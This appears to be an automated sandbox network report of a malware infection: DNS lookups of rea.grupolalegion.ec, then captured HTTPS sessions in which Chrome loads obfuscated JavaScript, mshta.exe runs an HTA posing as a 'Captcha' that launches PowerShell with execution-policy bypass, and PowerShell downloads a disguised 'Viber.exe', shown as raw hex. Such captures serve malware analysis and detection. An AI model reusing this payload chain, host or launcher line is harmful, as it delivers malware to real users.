Mar 7, 2025 11:49:01.147388935 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:49:06.157413006 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:06.157448053 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:06.157520056 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:06.157818079 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:06.157839060 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:07.869008064 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:07.869426012 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:07.869448900 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:07.869910002 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:07.870348930 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:07.870434046 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:07.988593102 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:17.546472073 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:17.546631098 CET	443	49728	142.250.186.36	192.168.2.7
Mar 7, 2025 11:49:17.546850920 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:18.187027931 CET	49728	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:49:18.187069893 CET	443	49728	142.250.186.36	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 11:48:01.976502895 CET	53	52373	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:01.989694118 CET	53	55123	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:05.707016945 CET	123	123	192.168.2.7	104.40.149.189
Mar 7, 2025 11:48:05.881886005 CET	123	123	104.40.149.189	192.168.2.7
Mar 7, 2025 11:48:06.089716911 CET	51513	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:06.089900017 CET	53450	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:06.096837997 CET	53	51513	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:06.097501040 CET	53	53450	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:06.925263882 CET	52000	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:06.925407887 CET	60016	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:07.134104013 CET	53	52000	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:07.235366106 CET	123	123	192.168.2.7	104.40.149.189
Mar 7, 2025 11:48:07.411530018 CET	53	60016	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:07.595613003 CET	123	123	104.40.149.189	192.168.2.7
Mar 7, 2025 11:48:10.640729904 CET	53	50836	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:13.975060940 CET	56595	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:13.975452900 CET	51990	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:14.083826065 CET	53	51990	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:14.185400963 CET	53	56595	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:24.215095043 CET	63853	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:24.223582029 CET	53	63853	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:27.552738905 CET	53	53913	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:42.687083960 CET	61889	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:48:42.795209885 CET	53	61889	1.1.1.1	192.168.2.7
Mar 7, 2025 11:48:46.646725893 CET	53	60937	1.1.1.1	192.168.2.7
Mar 7, 2025 11:49:01.441551924 CET	138	138	192.168.2.7	192.168.2.255
Mar 7, 2025 11:49:01.494415045 CET	53	63404	1.1.1.1	192.168.2.7
Mar 7, 2025 11:49:01.734858036 CET	49233	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:49:02.236890078 CET	53	49233	1.1.1.1	192.168.2.7
Mar 7, 2025 11:49:09.735733986 CET	53	60531	1.1.1.1	192.168.2.7
Mar 7, 2025 11:49:19.222724915 CET	52718	53	192.168.2.7	1.1.1.1
Mar 7, 2025 11:49:19.486464024 CET	53	52718	1.1.1.1	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 7, 2025 11:48:07.411629915 CET	192.168.2.7	1.1.1.1	c23c	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 11:48:06.089716911 CET	192.168.2.7	1.1.1.1	0x74db	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:06.089900017 CET	192.168.2.7	1.1.1.1	0xe28c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 7, 2025 11:48:06.925263882 CET	192.168.2.7	1.1.1.1	0xe03c	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:06.925407887 CET	192.168.2.7	1.1.1.1	0x2cdd	Standard query (0)	rea.grupolalegion.ec	65	IN (0x0001)	false
Mar 7, 2025 11:48:13.975060940 CET	192.168.2.7	1.1.1.1	0x7b3e	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:13.975452900 CET	192.168.2.7	1.1.1.1	0x9665	Standard query (0)	rea.grupolalegion.ec	65	IN (0x0001)	false
Mar 7, 2025 11:48:24.215095043 CET	192.168.2.7	1.1.1.1	0x13df	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:42.687083960 CET	192.168.2.7	1.1.1.1	0x61a3	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:49:01.734858036 CET	192.168.2.7	1.1.1.1	0x50ad	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:49:19.222724915 CET	192.168.2.7	1.1.1.1	0xf70b	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 11:48:06.096837997 CET	1.1.1.1	192.168.2.7	0x74db	No error (0)	www.google.com	142.250.186.36	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:06.097501040 CET	1.1.1.1	192.168.2.7	0xe28c	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 7, 2025 11:48:07.134104013 CET	1.1.1.1	192.168.2.7	0xe03c	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:14.185400963 CET	1.1.1.1	192.168.2.7	0x7b3e	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:24.223582029 CET	1.1.1.1	192.168.2.7	0x13df	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:48:42.795209885 CET	1.1.1.1	192.168.2.7	0x61a3	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:49:02.236890078 CET	1.1.1.1	192.168.2.7	0x50ad	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false
Mar 7, 2025 11:49:19.486464024 CET	1.1.1.1	192.168.2.7	0xf70b	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

rea.grupolalegion.ec

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49718	190.92.154.206	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 10:48:18 UTC	354	OUT	GET /p.php/1?js HTTP/1.1 Host: rea.grupolalegion.ec Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-07 10:48:18 UTC	563	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.4.33 content-type: application/javascript cache-control: public, max-age=604800 expires: Fri, 14 Mar 2025 10:48:18 GMT content-length: 7901 date: Fri, 07 Mar 2025 10:48:18 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-07 10:48:18 UTC	805	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 24 2c 78 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 24 2c 78 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 33 37 28 6e 2d 34 39 39 2c 24 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 24 2c 78 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 33 37 28 24 2d 36 30 35 2c 72 29 7d 66 6f 72 28 76 61 72 20 74 3d 24 28 29 3b 3b 29 74 72 79 7b 69 66 28 70 61 72 73 65 49 6e 74 28 72 28 31 30 38 36 2c 31 30 36 39 2c 31 30 38 30 2c 31 30 39 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 6e 28 39 35 31 2c 39 32 39 2c 39 35 38 2c 39 35 34 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 72 28 31 31 33 30 2c 31 31 31 34 2c 31 31 31 33 2c 31 30 39 36 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 72 28 31 30 38 34 2c 31 30 36 35 2c 31 30 39 38 Data Ascii: !function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3*(-parseInt(r(1084,1065,1098
2025-03-07 10:48:18 UTC	7096	IN	Data Raw: 78 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 6e 28 24 2c 78 2d 32 30 33 2c 78 2d 20 2d 37 32 36 2c 74 2d 32 33 30 29 7d 69 66 28 78 5b 65 28 39 37 2c 31 32 37 2c 31 33 39 2c 39 39 29 5d 28 63 28 31 33 35 35 2c 31 33 36 37 2c 31 33 32 37 2c 31 33 35 34 29 2c 78 5b 63 28 31 34 30 35 2c 31 34 31 36 2c 31 33 38 34 2c 31 33 38 36 29 5d 29 29 7b 76 61 72 20 75 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 7b 76 61 72 20 78 3d 74 5b 65 28 31 35 31 33 2c 31 33 30 2c 31 32 37 32 2c 31 33 37 38 29 5d 28 24 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 74 3d 6e 75 6c 6c 2c 78 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 72 3d 21 31 2c 75 7d 69 66 28 5f 30 78 34 36 62 30 66 37 29 7b 76 61 72 20 69 3d 5f 30 78 33 63 36 31 66 Data Ascii: x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null,x}}:function(){};return r=!1,u}if(_0x46b0f7){var i=_0x3c61f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49724	190.92.154.206	443	5220	C:\Windows\SysWOW64\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 10:48:25 UTC	309	OUT	GET /p.php HTTP/1.1 Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: rea.grupolalegion.ec Connection: Keep-Alive
2025-03-07 10:48:26 UTC	485	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.4.33 content-type: text/html; charset=UTF-8 content-length: 693 date: Fri, 07 Mar 2025 10:48:26 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-07 10:48:26 UTC	693	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 49 44 3d 22 43 53 22 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 43 61 70 74 63 68 61 22 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 20 4d 41 58 49 4d 49 5a 45 42 55 54 54 4f 4e 3d 22 6e 6f 22 20 4d 49 4e 49 4d 49 5a 45 42 55 54 54 4f 4e 3d 22 6e 6f 22 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 3e 3c 73 63 72 69 70 74 3e 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 65 70 20 42 79 70 61 73 73 20 2d 6e 6f 70 20 2d 63 20 5c 22 49 6e Data Ascii: <!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"In

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49725	190.92.154.206	443	7012	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 10:48:29 UTC	174	OUT	GET /Viber.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: rea.grupolalegion.ec Connection: Keep-Alive
2025-03-07 10:48:30 UTC	564	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Tue, 04 Mar 2025 06:02:20 GMT accept-ranges: bytes content-length: 2142592 date: Fri, 07 Mar 2025 10:48:29 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-disposition: attachment alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 44 1e 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 28 0b 00 00 d6 02 00 00 00 00 00 c0 0c 07 00 00 10 00 00 00 20 1d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 10 23 00 00 04 00 00 fa 71 21 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELD( @#q!@
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 00 00 00 90 8b 4c 24 3c 89 c8 83 c1 ff 8b 7c 24 40 89 fa 83 d2 ff 21 c1 21 d7 8b 5c 24 5c 8b 6c 24 60 8b 74 24 58 85 c9 0f 95 c0 85 ff 0f 95 c2 09 c2 84 d2 74 8c 89 4c 24 3c 89 7c 24 40 8b 43 34 8b 53 3c 0f bc e9 75 0d 0f bc ef 75 05 bd 20 00 00 00 83 c5 20 c1 ed 03 89 6c 24 44 0f af c5 83 c0 08 90 90 90 03 44 24 50 f7 c2 04 00 00 00 74 02 8b 00 89 44 24 4c 8b 4b 20 8b 51 10 8b 0a 8b 5c 24 64 89 1c 24 89 44 24 04 ff d1 0f b6 44 24 08 84 c0 0f 84 69 ff ff ff 8b 44 24 5c 8b 48 34 8b 54 24 44 0f af ca 03 48 38 83 c1 08 8b 40 3c 90 03 4c 24 50 a9 08 00 00 00 74 02 8b 09 8b 44 24 4c 89 44 24 68 89 4c 24 6c c6 44 24 70 01 83 c4 54 c3 c7 44 24 68 00 00 00 00 c7 44 24 6c 00 00 00 00 c6 44 24 70 00 83 c4 54 c3 e8 7e a0 06 00 e9 c9 fd ff ff cc cc cc cc cc cc cc cc Data Ascii: L$<\|$@!!\$\l$`t$XtL$<\|$@C4S<uu l$DD$PtD$LK Q\$d$D$D$iD$\H4T$DH8@<L$PtD$LD$hL$lD$pTD$hD$lD$pT~
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: d2 75 04 31 c0 eb 19 89 04 24 89 5c 24 04 c7 44 24 08 17 00 00 00 e8 05 a4 ff ff 0f b6 44 24 0c 88 44 24 1c 83 c4 10 c3 e8 43 61 06 00 eb a1 cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 76 60 8b 44 24 04 0f b7 08 8b 54 24 08 66 39 0a 75 4a 0f b7 48 02 66 39 4a 02 75 40 0f b7 48 04 66 39 4a 04 75 36 0f b6 48 06 38 4a 06 75 2d 8b 48 08 39 4a 08 75 25 8b 48 0c 39 4a 0c 75 16 8b 4a 10 8b 52 14 39 48 10 0f 94 c1 39 50 14 0f 94 c0 21 c8 eb 02 31 c0 88 44 24 0c c3 c6 44 24 0c 00 c3 e8 cb 60 06 00 eb 89 cc cc cc cc cc cc cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 b9 00 00 00 83 ec 10 8b 44 24 14 8b 48 04 8b 54 24 18 39 4a 04 0f 85 98 00 00 00 8b 5a 0c 39 58 0c 0f 85 8c 00 00 00 8b 58 10 39 5a 10 0f 85 80 00 00 00 8b 5a 18 39 58 18 75 78 0f b6 58 1c Data Ascii: u1$\$D$D$D$Ca_d;av`D$T$f9uJHf9Ju@Hf9Ju6H8Ju-H9Ju%H9JuJR9H9P!1D$D$`_d;aD$HT$9JZ9XX9ZZ9XuxX
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 8b 44 24 04 8b 4c 24 08 89 c2 8b 84 24 88 00 00 00 89 54 24 44 89 4c 24 30 8b 40 08 89 04 24 e8 3c 75 05 00 8b 84 24 88 00 00 00 8b 48 04 8b 54 24 04 8b 5c 24 08 85 c9 0f 84 a0 02 00 00 89 5c 24 38 89 54 24 4c 89 0c 24 e8 12 75 05 00 8b 84 24 88 00 00 00 8b 48 10 8b 54 24 04 8b 5c 24 08 85 c9 0f 85 c4 01 00 00 89 5c 24 34 89 54 24 48 8d 7c 24 54 31 c0 e8 09 37 06 00 c7 44 24 58 16 00 00 00 8d 0d e5 79 4d 00 89 4c 24 54 8b 4c 24 30 89 4c 24 60 8b 4c 24 44 89 4c 24 5c c7 44 24 68 04 00 00 00 8d 0d 37 41 4d 00 89 4c 24 64 89 5c 24 70 89 54 24 6c c7 44 24 78 06 00 00 00 8d 0d 0f 43 4d 00 89 4c 24 74 8b 4c 24 38 89 8c 24 80 00 00 00 8b 4c 24 4c 89 4c 24 7c c7 04 24 00 00 00 00 8d 4c 24 54 89 4c 24 04 c7 44 24 08 06 00 00 00 c7 44 24 0c 06 00 00 00 e8 b0 65 04 Data Ascii: D$L$$T$DL$0@$<u$HT$\$\$8T$L$u$HT$\$\$4T$H\|$T17D$XyML$TL$0L$`L$DL$\D$h7AML$d\$pT$lD$xCML$tL$8$L$LL$\|$L$TL$D$D$e
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 44 24 04 00 e8 67 20 ff ff 0f b6 44 24 08 f6 c0 01 74 6e f6 c0 02 74 0c 8b 44 24 14 89 04 24 e8 8c 00 00 00 8b 44 24 0c 8b 40 18 84 00 05 48 01 00 00 89 04 24 8b 44 24 14 89 44 24 04 e8 2e 27 02 00 8b 44 24 0c 8b 48 18 ff 49 7c 8b 48 18 8b 49 7c 85 c9 7c 15 75 0f 0f b6 48 69 84 c9 74 07 c7 40 08 de fa ff ff 83 c4 10 c3 8d 05 72 8c 4d 00 89 04 24 c7 44 24 04 1b 00 00 00 e8 9f a9 05 00 8d 05 eb 7d 4d 00 89 04 24 c7 44 24 04 17 00 00 00 e8 89 a9 05 00 90 e8 d3 e0 05 00 e9 2e ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 01 02 00 00 83 ec 2c 8b 44 24 30 84 00 89 04 24 e8 4b 1e ff ff 8b 05 e4 a2 5f 00 64 8b 00 8b 00 8b 40 18 8b 88 58 04 00 00 8b 90 5c 04 00 00 89 cb c1 e1 11 31 d9 89 d3 31 ca c1 e9 07 31 d1 Data Ascii: D$g D$tntD$$D$@H$D$D$.'D$HI\|HI\|\|uHit@rM$D$}M$D$._d;a,D$0$K_d@X\111
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 4c 24 18 8b 40 0c 89 44 24 14 e8 01 74 02 00 8d 05 21 56 4d 00 89 04 24 c7 44 24 04 0d 00 00 00 e8 3b 7c 02 00 8b 44 24 14 89 04 24 c7 44 24 04 00 00 00 00 e8 b7 7a 02 00 8d 05 60 52 4d 00 89 04 24 c7 44 24 04 0c 00 00 00 e8 11 7c 02 00 8b 44 24 18 89 04 24 c7 44 24 04 00 00 00 00 e8 8d 7a 02 00 8d 05 6c 52 4d 00 89 04 24 c7 44 24 04 0c 00 00 00 e8 e7 7b 02 00 8b 44 24 1c 89 04 24 c7 44 24 04 00 00 00 00 e8 c3 78 02 00 e8 de 73 02 00 e9 35 fe ff ff e8 74 73 02 00 8d 05 e7 85 4d 00 89 04 24 c7 44 24 04 19 00 00 00 e8 ae 7b 02 00 e8 b9 73 02 00 e9 30 ff ff ff e8 af a0 05 00 e9 aa fd ff ff cc cc cc cc cc cc cc cc cc cc 83 ec 1c 8b 4c 24 2c 89 c8 c1 e8 02 c1 e9 05 83 e0 07 8b 15 e4 a2 5f 00 64 8b 12 8b 12 8b 52 18 8b 52 58 89 54 24 18 84 02 89 cb 89 c1 bd 01 Data Ascii: L$@D$t!VM$D$;\|D$$D$z`RM$D$\|D$$D$zlRM$D${D$$D$xs5tsM$D${s0L$,_dRRXT$
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: a3 5f 00 8b 4c 24 10 8d 0c 89 85 c0 75 12 8b 44 24 20 8b 54 24 14 8b 5c 24 28 8b 6c 24 2c eb 40 e8 bb 75 05 00 8b 44 24 20 89 07 8b 54 24 14 8b 5c 8a 10 89 5f 04 8b 5c 24 28 89 5f 08 8b 6c 8a 1c 89 6f 0c 8b 6c 24 2c 89 6f 10 8b 74 8a 20 89 77 14 8b 74 24 1c 89 77 18 8b 74 8a 14 89 77 1c 89 44 8a 10 8b 44 24 24 89 44 8a 18 89 5c 8a 1c 89 6c 8a 20 8b 44 24 1c 89 44 8a 14 90 90 8d 05 04 a2 5f 00 89 04 24 e8 44 7f ff ff 90 8d 05 00 a2 5f 00 89 04 24 c7 44 24 04 08 00 00 00 e8 fd a0 fe ff 83 c4 18 c3 b9 cc 00 00 00 e8 4f 75 05 00 8d 15 1c 22 5d 00 0f b6 1c 02 8d 2d 60 a6 5f 00 88 5c 0d 00 8d 41 01 3d 80 00 00 00 0f 8d dd fe ff ff 89 c1 b8 cd cc cc cc f7 e9 01 ca c1 fa 02 8d 14 92 89 c8 29 d0 83 f8 05 72 c4 b9 05 00 00 00 e8 f9 74 05 00 8d 05 a9 82 4d 00 89 04 Data Ascii: _L$uD$ T$\$(l$,@uD$ T$\_\$(_lol$,ot wt$wtwDD$$D\l D$D_$D_$D$Ou"]-`_\A=)rtM
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 4d 00 89 04 24 c7 44 24 04 2b 00 00 00 e8 0e ea 04 00 90 e8 d8 20 05 00 e9 63 fe ff ff cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 81 00 00 00 83 ec 0c 8b 44 24 10 85 c0 74 27 8b 88 6c 09 00 00 85 c9 74 1d 8b 49 0c 85 c9 75 0d 8b 80 70 09 00 00 8b 40 0c 85 c0 74 09 c6 44 24 14 01 83 c4 0c c3 8d 05 c0 b9 5d 00 89 04 24 e8 ac 60 fe ff 8b 44 24 04 8b 4c 24 08 85 c0 0f 94 c0 85 c9 0f 94 c1 21 c1 84 c9 74 20 8b 05 70 ba 5d 00 39 05 74 ba 5d 00 76 09 c6 44 24 14 01 83 c4 0c c3 c6 44 24 14 00 83 c4 0c c3 c6 44 24 14 01 83 c4 0c c3 e8 b6 20 05 00 e9 61 ff ff ff cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 a8 04 00 00 83 ec 44 83 3d 14 a2 5f 00 02 0f 85 81 04 00 00 8b 44 24 48 89 05 7c ba 5d 00 8b 44 24 4c 89 05 80 ba 5d 00 8b 05 c0 b9 5d 00 89 Data Ascii: M$D$+ c_d;aD$t'ltIup@tD$]$`D$L$!t p]9t]vD$D$D$ a_d;aD=_D$H\|]D$L]]
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 00 00 e8 59 bc 01 00 8b 44 24 1c 89 04 24 c7 44 24 04 00 00 00 00 e8 35 b9 01 00 e8 f0 b5 01 00 e8 4b b4 01 00 8d 05 ce a0 4d 00 89 04 24 c7 44 24 04 20 00 00 00 e8 e5 a9 04 00 90 8b 84 24 90 00 00 00 89 04 24 e8 45 1e fe ff 8b 84 24 98 00 00 00 8b 48 54 89 8c 24 88 00 00 00 8b 40 58 89 84 24 84 00 00 00 8b 44 24 04 89 44 24 24 e8 9d b3 01 00 8d 05 95 7a 4d 00 89 04 24 c7 44 24 04 16 00 00 00 e8 d7 bb 01 00 8b 84 24 98 00 00 00 89 04 24 e8 48 bb 01 00 8d 05 9c 44 4d 00 89 04 24 c7 44 24 04 07 00 00 00 e8 b2 bb 01 00 8b 84 24 88 00 00 00 89 04 24 8b 84 24 84 00 00 00 89 44 24 04 e8 88 b8 01 00 8d 05 71 6d 4d 00 89 04 24 c7 44 24 04 13 00 00 00 e8 82 bb 01 00 8b 44 24 24 89 04 24 c7 44 24 04 00 00 00 00 e8 fe b9 01 00 e8 19 b5 01 00 e8 74 b3 01 00 8d 05 ab Data Ascii: YD$$D$5KM$D$ $$E$HT$@X$D$D$$zM$D$$$HDM$D$$$$D$qmM$D$D$$$D$t
2025-03-07 10:48:30 UTC	16384	IN	Data Raw: 24 c7 44 24 04 0c 00 00 00 e8 52 7c 01 00 8b 44 24 24 89 04 24 8b 44 24 28 89 44 24 04 e8 2e 79 01 00 e8 e9 75 01 00 e8 44 74 01 00 8d 05 6a c9 4d 00 89 04 24 c7 44 24 04 2d 00 00 00 e8 de 69 04 00 90 e8 28 a1 04 00 e9 43 fc ff ff cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 8e 02 00 00 83 ec 48 8b 44 24 4c 84 00 0f b6 4c 24 50 84 c9 74 1d 83 c0 50 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 e8 af e0 fd ff eb 36 8d 48 68 83 c0 50 89 44 24 44 89 0c 24 e8 7b e0 fd ff 8b 44 24 04 8b 4c 24 08 8b 54 24 44 89 14 24 05 00 00 10 00 89 44 24 04 83 d1 00 89 4c 24 08 e8 77 e0 fd ff 8b 44 24 4c 89 04 24 e8 ab de fd ff 8b 44 24 04 85 c0 7d 0f ba ff ff ff ff b9 ff ff ff ff e9 fc 00 00 00 89 44 24 20 c1 f8 1f 89 44 24 38 8b 44 24 4c 8d 88 80 00 Data Ascii: 